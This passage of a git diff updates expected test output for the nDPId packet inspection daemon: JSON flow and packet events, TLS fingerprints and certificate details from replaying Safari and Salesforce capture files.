+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+LVp22MQK\/Js6AS\/oitTAAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfiAbtAr8mz1adtjYAQECzKUwAAAQEICjMwye06Vq72"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620898025251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025251,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Xyf4O0ZsTOPKAS\/ohPpwAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620898025251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025251,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtflAbtmxM488n+DtYAQECxsqwAAAQEICjMwyfE6Vq75"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898027036,"flow_last_seen":1620898027036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898027036,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1620898027036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898027036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Etf1AbvGGXtuAAAAALAC\/\/+JoQAAAgQFtAEDAwUBAQgKMzDQVQAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5393,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1620898027065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898027065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71\/XZbafoxhl7b6AS\/ogqVAAAAgQFrAQCCAo6VrYRMzDQVQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5394,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1620898027065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898027065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Etf1AbvGGXtv2W2n6YAQECxHWQAAAQEICjMw0HE6VrYR"} +00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","packets-captured":6019,"packets-processed":6019,"total-skipped-flows":0,"total-l4-data-len":5172339,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1620898029980} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6019/6019 diff --git a/test/results/salesforce.pcap.out b/test/results/salesforce.pcap.out index 78c884f9c..fb9b8ad25 100644 --- a/test/results/salesforce.pcap.out +++ b/test/results/salesforce.pcap.out @@ -1,13 +1,13 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"salesforce.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1637949675032} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637949675032,"flow_last_seen":1637949675032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637949675032,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1637949675032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1637949675032,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlHnAqAGyVd6OBtR\/AbsUUf9OAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKBrZmwAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1637949675060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637949675060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGo31V3o4GwKgBsgG71H+paXwVFFH\/T6AScSBLcQAAAgQFjAQCCAok00OjBrZmwAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1637949675061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637949675061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlIXAqAGyVd6OBtR\/AbsUUf9PqWl8FoAQECja8QAAAQEICga2Ztwk00Oj"} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": 